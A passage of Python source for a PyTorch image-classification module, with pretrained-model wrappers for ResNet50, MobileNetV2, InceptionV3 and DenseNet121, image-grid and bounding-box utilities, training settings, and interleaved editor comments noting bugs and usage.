False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\nclass MobileNetV2Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.mobilenet_v2(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if 
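# --- Editor's sketch: intended usage of the *Pretrained wrappers above.
# Paths are hypothetical; the class expects an ImageNet label file and a
# torchvision resnet50 state_dict on disk. Note that model_path is a
# lambda-based property whose setter routes through set_model_path, and that
# classify() accepts top_n but the body hardcodes torch.topk(..., 5).
classifier = ResNet50Pretrained(label_path="imagenet_classes.txt")
classifier.model_path = "resnet50-weights.pth"   # calls set_model_path
classifier.load_model()
predictions = classifier.classify("images/", top_n=5, verbose=True)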
os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weight = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a valid path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\nclass InceptionV3Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.inception_v3(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(299),\r\n 
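# --- Editor's note: probable bug in MobileNetV2Pretrained.set_model_path
# above. It assigns `self.__has_loaded_weight = False` (missing trailing
# "s"), which creates a brand-new attribute instead of resetting
# self.__has_loaded_weights, so load_model() will skip reloading after the
# path changes. The ResNet50/InceptionV3/DenseNet121 variants spell the flag
# correctly. ("pretrianed" in the error messages is also a typo for
# "pretrained".)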
transforms.CenterCrop(299),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n print(images.shape)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n with open(os.path.join(str(Path(__file__).resolve().parent.parent), \"imagenet_classes.txt\")) as f:\r\n categories = [c.strip() for c in f.readlines()]\r\n predictions = [\r\n [\r\n (categories[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\ndef read_file(path: str) -> torch.Tensor:\r\n\r\n data = torch.ops.image.read_file(path)\r\n return data\r\n\r\n\r\ndef decode_image(input: torch.Tensor, mode: ImageReadMode = ImageReadMode.UNCHANGED) -> torch.Tensor:\r\n\r\n output = torch.ops.image.decode_image(input, mode.value)\r\n return output\r\n\r\n\r\ndef read_image(path: str, mode: ImageReadMode = ImageReadMode.UNCHANGED) -> torch.Tensor:\r\n\r\n data = 
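# --- Editor's note / sketch: InceptionV3Pretrained.classify above ignores
# the classes loaded in __init__ and re-reads "imagenet_classes.txt" from
# this file's grandparent directory, and it hardcodes top-5 regardless of
# top_n (it also leaves a debugging print(images.shape) in place).
# The read_file/decode_image/read_image helpers wrap the torch.ops.image
# kernels that torchvision.io exposes; hypothetical usage (path assumed):
img = read_image("sample.jpg", ImageReadMode.RGB)   # uint8 tensor, C x H x W
print(img.dtype, img.shape)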
read_file(path)\r\n return decode_image(data, mode)\r\n\r\n\r\ndef _generate_color_palette(num_objects: int):\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n return [tuple((i * palette) % 255) for i in range(num_objects)]\r\n\r\n\r\n@torch.no_grad()\r\ndef make_grid(\r\n tensor: Union[torch.Tensor, List[torch.Tensor]],\r\n nrow: int = 8,\r\n padding: int = 2,\r\n normalize: bool = False,\r\n value_range: Optional[Tuple[int, int]] = None,\r\n scale_each: bool = False,\r\n pad_value: float = 0.0,\r\n **kwargs,\r\n) -> torch.Tensor:\r\n if not (torch.is_tensor(tensor) or (isinstance(tensor, list) and all(torch.is_tensor(t) for t in tensor))):\r\n raise TypeError(f\"tensor or list of tensors expected, got {type(tensor)}\")\r\n\r\n if \"range\" in kwargs.keys():\r\n warnings.warn(\r\n \"The parameter 'range' is deprecated since 0.12 and will be removed in 0.14. \"\r\n \"Please use 'value_range' instead.\"\r\n )\r\n value_range = kwargs[\"range\"]\r\n\r\n \r\n if isinstance(tensor, list):\r\n tensor = torch.stack(tensor, dim=0)\r\n\r\n if tensor.dim() == 2: \r\n tensor = tensor.unsqueeze(0)\r\n if tensor.dim() == 3: \r\n if tensor.size(0) == 1: \r\n tensor = torch.cat((tensor, tensor, tensor), 0)\r\n tensor = tensor.unsqueeze(0)\r\n\r\n if tensor.dim() == 4 and tensor.size(1) == 1: \r\n tensor = torch.cat((tensor, tensor, tensor), 1)\r\n\r\n if normalize is True:\r\n tensor = tensor.clone() \r\n if value_range is not None:\r\n assert isinstance(\r\n value_range, tuple\r\n ), \"value_range has to be a tuple (min, max) if specified. min and max are numbers\"\r\n\r\n def norm_ip(img, low, high):\r\n img.clamp_(min=low, max=high)\r\n img.sub_(low).div_(max(high - low, 1e-5))\r\n\r\n def norm_range(t, value_range):\r\n if value_range is not None:\r\n norm_ip(t, value_range[0], value_range[1])\r\n else:\r\n norm_ip(t, float(t.min()), float(t.max()))\r\n\r\n if scale_each is True:\r\n for t in tensor: \r\n norm_range(t, value_range)\r\n else:\r\n norm_range(tensor, value_range)\r\n\r\n assert isinstance(tensor, torch.Tensor)\r\n if tensor.size(0) == 1:\r\n return tensor.squeeze(0)\r\n\r\n \r\n nmaps = tensor.size(0)\r\n xmaps = min(nrow, nmaps)\r\n ymaps = int(math.ceil(float(nmaps) / xmaps))\r\n height, width = int(tensor.size(2) + padding), int(tensor.size(3) + padding)\r\n num_channels = tensor.size(1)\r\n grid = tensor.new_full((num_channels, height * ymaps + padding, width * xmaps + padding), pad_value)\r\n k = 0\r\n for y in range(ymaps):\r\n for x in range(xmaps):\r\n if k >= nmaps:\r\n break\r\n grid.narrow(1, y * height + padding, height - padding).narrow( \r\n 2, x * width + padding, width - padding\r\n ).copy_(tensor[k])\r\n k = k + 1\r\n return grid\r\n\r\n\r\n@torch.no_grad()\r\ndef draw_bounding_boxes_and_labels(\r\n image: torch.Tensor,\r\n boxes: torch.Tensor,\r\n draw_boxes: bool,\r\n labels: Optional[List[str]] = None,\r\n label_color: Optional[Union[List[Union[str, Tuple[int, int, int]]], str, Tuple[int, int, int]]] = None,\r\n box_color: Optional[Union[List[Union[str, Tuple[int, int, int]]], str, Tuple[int, int, int]]] = None,\r\n fill: Optional[bool] = False,\r\n width: int = 1,\r\n font: Optional[str] = None,\r\n font_size: int = 10,\r\n) -> torch.Tensor:\r\n\r\n if not isinstance(image, torch.Tensor):\r\n raise TypeError(f\"Tensor expected, got {type(image)}\")\r\n elif image.dtype != torch.uint8:\r\n raise ValueError(f\"Tensor uint8 expected, got {image.dtype}\")\r\n elif image.dim() != 3:\r\n raise ValueError(\"Pass individual images, not batches\")\r\n 
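# --- Editor's sketch: make_grid output geometry. For B images of shape
# (C, H, W) laid out in rows of `nrow` with padding p, the grid above is
# (C, ymaps*(H+p)+p, xmaps*(W+p)+p). Quick check (torch + math only):
import math
import torch

tensor = torch.rand(10, 3, 32, 32)
nrow, padding = 8, 2
xmaps = min(nrow, tensor.size(0))             # 8 columns
ymaps = math.ceil(tensor.size(0) / xmaps)     # 2 rows
h, w = tensor.size(2) + padding, tensor.size(3) + padding
print((3, ymaps * h + padding, xmaps * w + padding))   # (3, 70, 274)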
elif image.size(0) not in {1, 3}:\r\n raise ValueError(\"Only grayscale and RGB images are supported\")\r\n\r\n num_boxes = boxes.shape[0]\r\n\r\n if labels is None:\r\n labels: Union[List[str], List[None]] = [None] * num_boxes \r\n elif len(labels) != num_boxes:\r\n raise ValueError(\r\n f\"Number of boxes ({num_boxes}) and labels ({len(labels)}) mismatch. Please specify labels for each box.\"\r\n )\r\n\r\n \r\n if image.size(0) == 1:\r\n image = torch.tile(image, (3, 1, 1))\r\n\r\n ndarr = image.permute(1, 2, 0).cpu().numpy()\r\n img_to_draw = Image.fromarray(ndarr)\r\n img_boxes = boxes.to(torch.int64).tolist()\r\n\r\n if fill:\r\n draw = ImageDraw.Draw(img_to_draw, \"RGBA\")\r\n else:\r\n draw = ImageDraw.Draw(img_to_draw)\r\n\r\n txt_font = ImageFont.load_default() if font is None else ImageFont.truetype(font=font, size=font_size)\r\n\r\n for bbox, label in zip(img_boxes, labels):\r\n if draw_boxes:\r\n if fill:\r\n fill_color = label_color + (100,)\r\n draw.rectangle(bbox, width=width, outline=label_color, fill=fill_color)\r\n else:\r\n draw.rectangle(bbox, width=width, outline=box_color)\r\n\r\n if label is not None:\r\n margin = width + 1\r\n draw.text((bbox[0] + margin, bbox[1] + margin), label, fill=label_color, font=txt_font)\r\n\r\n return torch.from_numpy(np.array(img_to_draw)).permute(2, 0, 1).to(dtype=torch.uint8)\r\n\r\n\r\n@torch.no_grad()\r\ndef tensor_to_ndarray(\r\n tensor: Union[torch.Tensor, List[torch.Tensor]],\r\n **kwargs,\r\n) -> None:\r\n\r\n grid = make_grid(tensor, **kwargs)\r\n \r\n ndarr = grid.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to(\"cpu\", torch.uint8).numpy()\r\n\r\n return ndarr\r\n\r\n\r\nclass DenseNet121Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.densenet121(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> 
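# --- Editor's note: colour handling in draw_bounding_boxes_and_labels above.
# When fill=True, fill_color is built as label_color + (100,), so label_color
# must be an RGB tuple (a colour string would raise TypeError) and the box
# outline uses label_color; box_color is only honoured in the fill=False
# branch. Also, tensor_to_ndarray is annotated `-> None` but actually returns
# the uint8 H x W x C numpy array.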
None:\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n if not self.__has_loaded_weights:\r\n try:\r\n import re\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n self.__model.load_state_dict(state_dict)\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n if not self.__has_loaded_weights:\r\n warnings.warn(\"Pretrained weights aren't loaded\", ResourceWarning)\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\nclassification_models = {\r\n \"resnet50\": {\r\n \"model\": resnet50(pretrained=False)\r\n },\r\n \"densenet121\": {\r\n \"model\": densenet121(pretrained=False)\r\n },\r\n \"inceptionv3\": {\r\n \"model\": inception_v3(pretrained=False)\r\n },\r\n \"mobilenetv2\": {\r\n \"model\": mobilenet_v2(pretrained=False)\r\n }\r\n}\r\n\r\n\r\nclass ImageClassification:\r\n def __init__(self) -> None:\r\n self.__model_type: str = None\r\n self.__model: Union[resnet50, densenet121, mobilenet_v2, inception_v3] = None\r\n self.__model_path: str = None\r\n self.__classes_path: str = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"imagenet_classes.txt\")\r\n self.__model_loaded: bool = False\r\n self.__device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__classes: List[str] = []\r\n\r\n def setModelPath(self, path: str):\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n else:\r\n raise ValueError(\r\n f\"The path '{path}' isn't a valid file. 
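# --- Editor's sketch: what the DenseNet key-remap regex above does. Older
# torchvision DenseNet checkpoints name sub-modules "norm.1"/"conv.2" etc.,
# while current models expect "norm1"/"conv2"; the pattern rewrites the keys:
import re

pattern = re.compile(
    r"^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\."
    "(?:weight|bias|running_mean|running_var))$"
)
key = "features.denseblock1.denselayer1.norm.1.weight"
res = pattern.match(key)
print(res.group(1) + res.group(2))
# features.denseblock1.denselayer1.norm1.weight
# (Note: the classification_models dict above instantiates all four
# torchvision models eagerly at import time, even if only one is used.)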
Ensure you specify the path to a valid trained model file.\"\r\n )\r\n\r\n def __load_classes(self) -> List[str]:\r\n with open(self.__classes_path) as f:\r\n self.__classes = [c.strip() for c in f.readlines()]\r\n\r\n def __load_image(self, image_input: Union[str, np.ndarray, Image.Image]) -> torch.Tensor:\r\n images = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if type(image_input) == str:\r\n if os.path.isfile(image_input):\r\n img = Image.open(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"image path '{image_input}' is not found or a valid file\")\r\n elif type(image_input) == np.ndarray:\r\n img = Image.fromarray(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n elif \"PIL\" in str(type(image_input)):\r\n img = image_input.convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n return torch.stack(images)\r\n\r\n def setModelTypeAsResNet50(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"resnet50\"\r\n\r\n def setModelTypeAsDenseNet121(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"densenet121\"\r\n\r\n def setModelTypeAsInceptionV3(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"inceptionv3\"\r\n\r\n def setModelTypeAsMobileNetV2(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"mobilenetv2\"\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self):\r\n if not self.__model_loaded:\r\n try:\r\n if self.__model_path == None:\r\n raise ValueError(\r\n \"Model path not specified. Call '.setModelPath()' and parse the path to the model file before loading the model.\"\r\n )\r\n\r\n if self.__model_type in classification_models.keys():\r\n self.__model = classification_models[self.__model_type][\"model\"]\r\n else:\r\n raise ValueError(\r\n f\"Model type '{self.__model_type}' not supported.\"\r\n )\r\n state_dict = torch.load(self.__model_path)\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(\r\n state_dict\r\n )\r\n self.__model.to(self.__device)\r\n self.__model_loaded = True\r\n self.__model.eval()\r\n self.__load_classes()\r\n except Exception:\r\n print(traceback.print_exc())\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classifyImage(self, image_input: Union[str, np.ndarray, Image.Image], result_count: int = 5) -> Tuple[\r\n List[str], List[float]]:\r\n if not self.__model_loaded:\r\n raise RuntimeError(\r\n \"Model not yet loaded. 
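# --- Editor's sketch: ImageClassification usage (all paths hypothetical).
# Note the setModelTypeAs* methods above only assign when no type is set, so
# the type cannot be switched later, and loadModel() calls torch.load without
# map_location, so a GPU-saved checkpoint needs CUDA available here.
predictor = ImageClassification()
predictor.setModelTypeAsResNet50()
predictor.setModelPath("resnet50-weights.pth")
predictor.loadModel()
labels, probs = predictor.classifyImage("sample.jpg", result_count=3)
for label, prob in zip(labels, probs):
    print(f"{label}: {prob:.2f}%")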
You need to call '.loadModel()' before performing image classification\"\r\n )\r\n\r\n images = self.__load_image(image_input)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n topN_prob, topN_catid = torch.topk(probabilities, result_count)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[topN_catid[i][j]], topN_prob[i][j].item() * 100)\r\n for j in range(topN_prob.shape[1])\r\n ]\r\n for i in range(topN_prob.shape[0])\r\n ]\r\n\r\n labels_pred = []\r\n probabilities_pred = []\r\n\r\n for idx, pred in enumerate(predictions):\r\n for label, score in pred:\r\n labels_pred.append(label)\r\n probabilities_pred.append(round(score, 4))\r\n\r\n return labels_pred, probabilities_pred\r\n\r\ndef resnet50_train_params():\r\n model = resnet50(pretrained=False)\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 1e-4,\r\n \"lr\": 0.1,\r\n \"lr_decay_rate\": None,\r\n \"lr_step_size\": None\r\n }\r\n\r\n\r\ndef inception_v3_train_params():\r\n model = inception_v3(pretrained=False, init_weights=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 0,\r\n \"lr\": 0.045,\r\n \"lr_decay_rate\": 0.94,\r\n \"lr_step_size\": 2\r\n }\r\n\r\n\r\ndef mobilenet_v2_train_params():\r\n model = mobilenet_v2(pretrained=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 4e-5,\r\n \"lr\": 0.045,\r\n \"lr_decay_rate\": 0.98,\r\n \"lr_step_size\": 1\r\n }\r\n\r\n\r\ndef densenet121_train_params():\r\n model = densenet121(pretrained=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 1e-4,\r\n \"lr\": 0.1,\r\n \"lr_decay_rate\": None,\r\n \"lr_step_size\": None,\r\n }\r\ndata_transforms1 = {\r\n \"train\":transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ]),\r\n \"test\": transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ])\r\n }\r\n\r\ndata_transforms2 = {\r\n \"train\":transforms.Compose([\r\n transforms.RandomResizedCrop(299),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ]),\r\n \"test\": transforms.Compose([\r\n transforms.Resize(299),\r\n transforms.CenterCrop(299),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ])\r\n }\r\n\r\ndef extension_check(file_path: str):\r\n if file_path.endswith(\".h5\"):\r\n raise RuntimeError(\"Fara modele .h5\")\r\n elif file_path.endswith(\".pt\") == False and file_path.endswith(\".pth\") == False:\r\n raise ValueError(f\"Model nevalid {os.path.basename(file_path)}. 
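# --- Editor's note / sketch: the *_train_params dicts above pair each
# torchvision model with SGD and, for inception/mobilenet, a StepLR schedule
# (gamma = lr_decay_rate applied every lr_step_size epochs). The trainer
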